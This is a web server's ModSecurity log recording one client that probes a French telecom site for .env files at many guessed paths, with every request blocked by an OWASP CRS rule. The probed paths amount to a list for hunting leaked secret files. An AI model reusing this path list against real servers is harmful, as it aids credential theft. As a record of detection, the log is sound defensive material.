[Mon May 11 17:22:43.286092 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySPAAAAQs"]
[Mon May 11 17:22:43.286573 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySPAAAAQs"]
[Mon May 11 17:22:43.286823 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySPAAAAQs"]
[Mon May 11 17:22:43.449342 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/server/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySPQAAAQs"]
[Mon May 11 17:22:43.449828 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/server/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySPQAAAQs"]
[Mon May 11 17:22:43.450074 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/server/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySPQAAAQs"]
[Mon May 11 17:22:43.612447 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/frontend/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySPgAAAQs"]
[Mon May 11 17:22:43.612944 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/frontend/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySPgAAAQs"]
[Mon May 11 17:22:43.613179 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/frontend/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySPgAAAQs"]
[Mon May 11 17:22:43.776363 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/src/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySQAAAAQs"]
[Mon May 11 17:22:43.776842 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/src/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySQAAAAQs"]
[Mon May 11 17:22:43.777072 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/src/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySQAAAAQs"]
[Mon May 11 17:22:43.938664 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/core/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySQQAAAQs"]
[Mon May 11 17:22:43.939176 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/core/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySQQAAAQs"]
[Mon May 11 17:22:43.939413 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/core/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySQQAAAQs"]
[Mon May 11 17:22:44.102620 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/core/app/.env"] [unique_id "agH0REWKUxpmnkK7zHySQgAAAQs"]
[Mon May 11 17:22:44.103101 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/core/app/.env"] [unique_id "agH0REWKUxpmnkK7zHySQgAAAQs"]
[Mon May 11 17:22:44.103336 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/core/app/.env"] [unique_id "agH0REWKUxpmnkK7zHySQgAAAQs"]
[Mon May 11 17:22:44.264865 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agH0REWKUxpmnkK7zHySQwAAAQs"]
[Mon May 11 17:22:44.265376 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agH0REWKUxpmnkK7zHySQwAAAQs"]
[Mon May 11 17:22:44.265637 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agH0REWKUxpmnkK7zHySQwAAAQs"]
[Mon May 11 17:22:44.426952 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/private/.env"] [unique_id "agH0REWKUxpmnkK7zHySRAAAAQs"]
[Mon May 11 17:22:44.427457 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/private/.env"] [unique_id "agH0REWKUxpmnkK7zHySRAAAAQs"]
[Mon May 11 17:22:44.427717 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/private/.env"] [unique_id "agH0REWKUxpmnkK7zHySRAAAAQs"]
[Mon May 11 17:22:44.593002 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/application/.env"] [unique_id "agH0REWKUxpmnkK7zHySRQAAAQs"]
[Mon May 11 17:22:44.593512 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/application/.env"] [unique_id "agH0REWKUxpmnkK7zHySRQAAAQs"]
[Mon May 11 17:22:44.593740 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/application/.env"] [unique_id "agH0REWKUxpmnkK7zHySRQAAAQs"]
[Mon May 11 17:22:44.757881 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/bootstrap/.env"] [unique_id "agH0REWKUxpmnkK7zHySRgAAAQs"]
[Mon May 11 17:22:44.758383 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/bootstrap/.env"] [unique_id "agH0REWKUxpmnkK7zHySRgAAAQs"]
[Mon May 11 17:22:44.758619 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/bootstrap/.env"] [unique_id "agH0REWKUxpmnkK7zHySRgAAAQs"]
[Mon May 11 17:22:44.920200 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/database/.env"] [unique_id "agH0REWKUxpmnkK7zHySRwAAAQs"]
[Mon May 11 17:22:44.920701 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/database/.env"] [unique_id "agH0REWKUxpmnkK7zHySRwAAAQs"]
[Mon May 11 17:22:44.920941 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/database/.env"] [unique_id "agH0REWKUxpmnkK7zHySRwAAAQs"]
[Mon May 11 17:22:45.082119 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agH0RUWKUxpmnkK7zHySSAAAAQs"]
[Mon May 11 17:22:45.082619 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agH0RUWKUxpmnkK7zHySSAAAAQs"]
[Mon May 11 17:22:45.082845 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agH0RUWKUxpmnkK7zHySSAAAAQs"]
[Mon May 11 17:22:45.244584 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agH0RUWKUxpmnkK7zHySSQAAAQs"]
[Mon May 11 17:22:45.245079 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agH0RUWKUxpmnkK7zHySSQAAAQs"]
[Mon May 11 17:22:45.245342 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agH0RUWKUxpmnkK7zHySSQAAAQs"]
